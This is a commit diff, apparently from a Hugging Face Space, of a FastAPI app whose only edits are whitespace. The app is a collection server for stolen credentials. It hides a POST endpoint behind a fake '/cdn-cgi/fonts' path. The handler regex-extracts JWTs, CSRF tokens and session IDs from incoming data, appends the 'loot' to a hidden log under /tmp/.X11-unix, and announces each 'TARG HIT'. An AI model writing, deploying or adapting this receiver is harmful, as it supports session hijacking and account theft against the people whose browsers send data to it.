Spaces:
Sleeping
Sleeping
Update app.py
Browse files
app.py
CHANGED
|
@@ -3,7 +3,6 @@ import os, json, re, hashlib, asyncio, random
|
|
| 3 |
from datetime import datetime
|
| 4 |
|
| 5 |
app = FastAPI()
|
| 6 |
-
|
| 7 |
LOG = "/tmp/.X11-unix/.slurplog.sock"
|
| 8 |
os.makedirs(os.path.dirname(LOG), exist_ok=True)
|
| 9 |
|
|
@@ -13,41 +12,34 @@ def live():
|
|
| 13 |
|
| 14 |
@app.post("/cdn-cgi/fonts")
|
| 15 |
async def silent_sink(req: Request):
|
| 16 |
-
await asyncio.sleep(random.uniform(0.2, 1.2))
|
| 17 |
-
|
| 18 |
try:
|
| 19 |
j = await req.json()
|
| 20 |
except:
|
| 21 |
return {"err": "invalid json"}
|
| 22 |
-
|
| 23 |
ip = req.headers.get("x-forwarded-for", "?.?.?.?")
|
| 24 |
ua = req.headers.get("user-agent", "")
|
| 25 |
ref = req.headers.get("referer", "")
|
| 26 |
ts = datetime.utcnow().isoformat()
|
| 27 |
raw = json.dumps(j)
|
| 28 |
sig = hashlib.md5(raw.encode()).hexdigest()
|
| 29 |
-
|
| 30 |
marks = {
|
| 31 |
"jwt": re.findall(r'eyJ[\w-]+\.[\w-]+\.[\w-]+', raw),
|
| 32 |
"csrf": re.findall(r'csrf[_\-]?(token)?[\'"]?\s*[:=]\s*[\'"]?([\w\-_]{8,})', raw, re.I),
|
| 33 |
"session": re.findall(r'(?:sessionid|sid)[=:]+([\w\-_.]{10,})', raw, re.I)
|
| 34 |
}
|
| 35 |
-
|
| 36 |
entry = {
|
| 37 |
"ts": ts, "ip": ip, "ua": ua, "ref": ref,
|
| 38 |
"hash": sig, "mark": marks, "loot": j
|
| 39 |
}
|
| 40 |
-
|
| 41 |
try:
|
| 42 |
with open(LOG, "a") as f:
|
| 43 |
f.write(json.dumps(entry) + "\n")
|
| 44 |
except:
|
| 45 |
pass
|
| 46 |
-
|
| 47 |
print(f"\033[92m🔥 TARG HIT: {ip} @ {ts}\033[0m")
|
| 48 |
if any(marks.values()):
|
| 49 |
print(f"\033[91m🧠 Tokens found: {json.dumps(marks)}\033[0m")
|
| 50 |
else:
|
| 51 |
print(f"\033[90m...no tokens detected\033[0m")
|
| 52 |
-
|
| 53 |
return {"ok": True, "hash": sig, "tokens": any(marks.values())}
|
|
|
|
| 3 |
from datetime import datetime
|
| 4 |
|
| 5 |
app = FastAPI()
|
|
|
|
| 6 |
LOG = "/tmp/.X11-unix/.slurplog.sock"
|
| 7 |
os.makedirs(os.path.dirname(LOG), exist_ok=True)
|
| 8 |
|
|
|
|
| 12 |
|
| 13 |
@app.post("/cdn-cgi/fonts")
|
| 14 |
async def silent_sink(req: Request):
|
| 15 |
+
await asyncio.sleep(random.uniform(0.2, 1.2))
|
|
|
|
| 16 |
try:
|
| 17 |
j = await req.json()
|
| 18 |
except:
|
| 19 |
return {"err": "invalid json"}
|
|
|
|
| 20 |
ip = req.headers.get("x-forwarded-for", "?.?.?.?")
|
| 21 |
ua = req.headers.get("user-agent", "")
|
| 22 |
ref = req.headers.get("referer", "")
|
| 23 |
ts = datetime.utcnow().isoformat()
|
| 24 |
raw = json.dumps(j)
|
| 25 |
sig = hashlib.md5(raw.encode()).hexdigest()
|
|
|
|
| 26 |
marks = {
|
| 27 |
"jwt": re.findall(r'eyJ[\w-]+\.[\w-]+\.[\w-]+', raw),
|
| 28 |
"csrf": re.findall(r'csrf[_\-]?(token)?[\'"]?\s*[:=]\s*[\'"]?([\w\-_]{8,})', raw, re.I),
|
| 29 |
"session": re.findall(r'(?:sessionid|sid)[=:]+([\w\-_.]{10,})', raw, re.I)
|
| 30 |
}
|
|
|
|
| 31 |
entry = {
|
| 32 |
"ts": ts, "ip": ip, "ua": ua, "ref": ref,
|
| 33 |
"hash": sig, "mark": marks, "loot": j
|
| 34 |
}
|
|
|
|
| 35 |
try:
|
| 36 |
with open(LOG, "a") as f:
|
| 37 |
f.write(json.dumps(entry) + "\n")
|
| 38 |
except:
|
| 39 |
pass
|
|
|
|
| 40 |
print(f"\033[92m🔥 TARG HIT: {ip} @ {ts}\033[0m")
|
| 41 |
if any(marks.values()):
|
| 42 |
print(f"\033[91m🧠 Tokens found: {json.dumps(marks)}\033[0m")
|
| 43 |
else:
|
| 44 |
print(f"\033[90m...no tokens detected\033[0m")
|
|
|
|
| 45 |
return {"ok": True, "hash": sig, "tokens": any(marks.values())}
|